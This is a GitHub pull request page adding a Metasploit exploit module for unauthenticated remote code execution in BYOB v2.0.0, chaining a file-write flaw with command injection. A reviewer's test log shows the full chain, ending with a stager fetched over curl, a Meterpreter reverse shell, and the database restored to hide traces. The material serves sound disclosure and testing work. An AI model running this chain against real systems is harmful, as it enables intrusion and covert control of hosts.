-
Notifications
You must be signed in to change notification settings - Fork 13.9k
New issue
Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.
By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.
Already on GitHub? Sign in to your account
Add BYOB Unauthenticated RCE module (CVE-2024-45256, CVE-2024-45257) #19485
Conversation
…nd command injection (CVE-2024-45256, CVE-2024-45257)
Co-authored-by: Spencer McIntyre <[email protected]>
Co-authored-by: Spencer McIntyre <[email protected]>
Co-authored-by: Spencer McIntyre <[email protected]>
There was a problem hiding this comment.
Choose a reason for hiding this comment
The reason will be displayed to describe this comment to others. Learn more.
The changes are as follows
Hello @Chocapikk,
|
There was a problem hiding this comment.
Choose a reason for hiding this comment
The reason will be displayed to describe this comment to others. Learn more.
Ok I've retested after the changes, looks good to me.
msf6 exploit(unix/webapp/byob_unauth_rce) >
[*] Fetch handler listening on 172.26.52.39:8080
[*] HTTP server started
[*] Adding resource /byobfetch
[*] Started reverse TCP handler on 172.26.52.39:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be BYOB.
[+] The target is vulnerable.
[*] Using URL: http://172.26.52.39:5000/rmTHGJSSF7
[*] Payload is ready at /
[*] Generating malicious SQLite database.
[+] Malicious database uploaded successfully to the following paths: /proc/self/cwd/../../../../buildyourownbotnet/database.db
[*] Registering a new admin user: admin:SsOOH3Tuk9dD
[+] Registered user!
[*] Logging in with the new admin user.
[+] Logged in successfully!
[*] Injecting payload via command injection.
[*] Received request at: / - Client Address: 172.26.60.213
[*] Sending response to 172.26.60.213 for /
[*] Client 172.26.60.213 requested /byobfetch
[*] Sending payload to 172.26.60.213 (curl/7.81.0)
[*] Transmitting intermediate stager...(126 bytes)
[*] Sending stage (3045380 bytes) to 172.26.60.213
[*] Restoring the database via Meterpreter to avoid leaving traces.
[+] Database has been successfully restored to its clean state.
[*] Meterpreter session 1 opened (172.26.52.39:4444 -> 172.26.60.213:60774) at 2024-10-14 08:14:50 -0400
msf6 exploit(unix/webapp/byob_unauth_rce) > sessions
Active sessions
===============
Id Name Type Information Connection
-- ---- ---- ----------- ----------
1 meterpreter x64/linux user @ 172.26.60.213 172.26.52.39:4444 -> 172.26.60.213:60774 (172.26.60.213)
msf6 exploit(unix/webapp/byob_unauth_rce) > sessions -i -1
[*] Starting interaction with 1...
meterpreter > getuid
Server username: user
meterpreter > sysinfo
Computer : 172.26.60.213
OS : LinuxMint 21.3 (Linux 5.15.0-91-generic)
Architecture : x64
BuildTuple : x86_64-linux-musl
Meterpreter : x64/linux
meterpreter >
Release NotesThis adds an exploit module for BYOB unauthenticated RCE (CVE-2024-45256, CVE-2024-45257) |
Hello Metasploit Team,
I hope this message finds you well.
I am submitting a new module that exploits two critical vulnerabilities identified in the BYOB (Build Your Own Botnet) v2.0.0. These vulnerabilities include an Unauthenticated Arbitrary File Write (CVE-2024-45256) and an Authenticated Command Injection (CVE-2024-45257), which allows attackers to bypass authentication and achieve Remote Code Execution (RCE). The latest BYOB version still remains vulnerable as of today.
Module Overview:
Testing:
This module has been tested against BYOB versions 2.0.0 on Linux Mint environment running Python 3.10.12.
Verification Steps:
exploit/unix/webapp/byob_unauth_rce
Thank you for reviewing this contribution. Looking forward to your feedback!